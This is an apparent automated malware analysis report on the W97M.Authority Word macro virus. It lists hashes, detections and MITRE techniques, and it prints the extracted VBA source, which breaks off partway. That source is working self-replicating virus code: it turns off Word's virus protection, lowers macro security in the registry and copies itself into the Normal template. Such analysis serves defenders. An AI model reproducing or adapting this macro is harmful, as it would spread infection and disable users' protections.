W97M.Authority — Office (OLE) malware analysis

Static analysis result for SHA-256 938f4ad0ebd68d30…

MALICIOUS

Office (OLE)

Size: 36.5 KB
Created: 2003-01-03 11:33:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 0353cb4022e7577f5d0c184cf574b575
SHA-1: 424372e57e5bbb9949fa83aac6c970ffb51270a7
SHA-256: 938f4ad0ebd68d3016c628b89067a3842519a8f9bf0b97e8bdeb0c7e4ff2c8fb
Risk score: 180

Malware Insights

W97M.Authority · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro designed to disable macro security settings. It attempts to write to registry keys 'HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security' to lower security levels. This is a common technique for macro-based malware to facilitate the execution of further malicious code.

Heuristics (3)

  • ClamAV: Doc.Trojan.Aurity-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Aurity-1
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro present; it runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5921 bytes
SHA-256: c91ac8724ec52fd4db7ec83a256ff23a85898d656b80a294230e75f8ce859c68
Detection
ClamAV: Doc.Trojan.Aurity-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Authority > ÌÒÖÑÌÑÈÈÊÙÒØÆßàÍÞÉÍ
Private Sub Document_Open()
On Error Resume Next
With Options
.VirusProtection = False: .SaveNormalPrompt = False: .ConfirmConversions = False
End With
SoftwareKey = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
SecurityKey = Application.Version & "\Word\Security"
OfficeKey = SoftwareKey & SecurityKey
For CLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", OfficeKey, KeyArray(CLoop)) = 1&
Next CLoop
Set DocTT = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set DocNT = NormalTemplate.VBProject.VBComponents(1).CodeModule
TTMarker = Left(DocTT.Lines(1, 1), 13)
NTMarker = Left(DocNT.Lines(1, 1), 13)
Randomize
For RLoop = 1 To Int((30 * Rnd) + 1)
Randomize
If Int((2 * Rnd) + 1) = 1 Then
RCase = 199
Else
RCase = 197
End If
Randomize
R = R & Chr(Int((26 * Rnd) + RCase))
Next
If TTMarker <> "'Authority > " Then
Do
e = e + 1
NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf
Loop Until e = DocNT.CountOfLines
DocTT.DeleteLines 1, DocTT.CountOfLines
DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)
DocTT.ReplaceLine 1, "'Authority > " & R
DocTT.ReplaceLine 2, "Private Sub Document_Open()"
TTC = True
End If
If NTMarker <> "'Authority > " Then
Do
C = C + 1
TTLines = TTLines & DocTT.Lines(C, 1) & vbCrLf
Loop Until C = DocTT.CountOfLines
DocNT.DeleteLines 1, DocNT.CountOfLines
DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)
DocNT.ReplaceLine 1, "'Authority > " & R
DocNT.ReplaceLine 2, "Private Sub Document_Close()"
NTC = True
End If
If TTC = True Then
Randomize
If Int((2 * Rnd) + 1) = 1 Then
C1 = 29: C2 = 30: C3 = 31: C4 = 32: C5 = 33: C6 = 34
C7 = 35: C8 = 36: C9 = 37: C10 = 38: C11 = 39
K1 = 40: K2 = 41: K3 = 42: K4 = 43: K5 = 44: K6 = 45
K7 = 46: K8 = 47: K9 = 48: K10 = 49: K11 = 50
Else
C1 = 40: C2 = 41: C3 = 42: C4 = 43: C5 = 44: C6 = 45
C7 = 46: C8 = 47: C9 = 48: C10 = 49: C11 = 50
K1 = 29: K2 = 30: K3 = 31: K4 = 32: K5 = 33: K6 = 34
K7 = 35: K8 = 36: K9 = 37: K10 = 38: K11 = 39
End If
With DocTT
.ReplaceLine C1, "If TTMarker <> ""'Authority > "" Then"
.ReplaceLine C2, "Do"
.ReplaceLine C3, "e = e + 1"
.ReplaceLine C4, "NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf"
.ReplaceLine C5, "Loop Until e = DocNT.CountOfLines"
.ReplaceLine C6, "DocTT.DeleteLines 1, DocTT.CountOfLines"
.ReplaceLine C7, "DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)"
.ReplaceLine C8, "DocTT.ReplaceLine 1, ""'Authority > "" & R"
.ReplaceLine C9, "DocTT.ReplaceLine 2, ""Private Sub Document_Open()"""
.ReplaceLine C10, "TTC = True"
.ReplaceLine C11, "End If"
.ReplaceLine K1, "If NTMarker <> ""'Authority > "" Then"
.ReplaceLine K2, "Do"
.ReplaceLine K3, "c = c + 1"
.ReplaceLine K4, "TTLines = TTLines & DocTT.Lines(c, 1) & vbCrLf"
.ReplaceLine K5, "Loop Until c = DocTT.CountOfLines"
.ReplaceLine K6, "DocNT.DeleteLines 1, DocNT.CountOfLines"
.ReplaceLine K7, "DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)"
.ReplaceLine K8, "DocNT.ReplaceLine 1, ""'Authority > "" & R"
.ReplaceLine K9, "DocNT.ReplaceLine 2, ""Private Sub Document_Close()"""
.ReplaceLine K10, "NTC = True"
.ReplaceLine K11, "End If"
End With
E1 = "VirusProtection"
E2 = "SaveNormalPrompt"
E3 = "ConfirmConversions"
EF = " = False"
EN = ": ."
Randomize
Select Case Int((6 * Rnd) + 1)
Case 1: RL = Chr(46) & E1 & EF & EN & E2 & EF & EN & E3 & EF
Case 2: RL = Chr(46) & E1 & EF & EN & E3 & EF & EN & E2 & EF
Case 3: RL = Chr(46) & E2 & EF & EN & E1 & EF & EN & E3 & EF
Case 4: RL = Chr(46) & E2 & EF & EN & E3 & EF & EN & E1 & EF
Case 5: RL = Chr(46) & E3 & EF & EN & E1 & EF & EN & E2 & EF
Case 6: RL = Chr(46) & E3 & EF & EN & E2 & EF & EN & E1 & EF
End Select
DocTT.ReplaceLine 5, RL
RC1 = ".VBProject.VBComponents(1).CodeModule"
RC2 = "Set
... (truncated)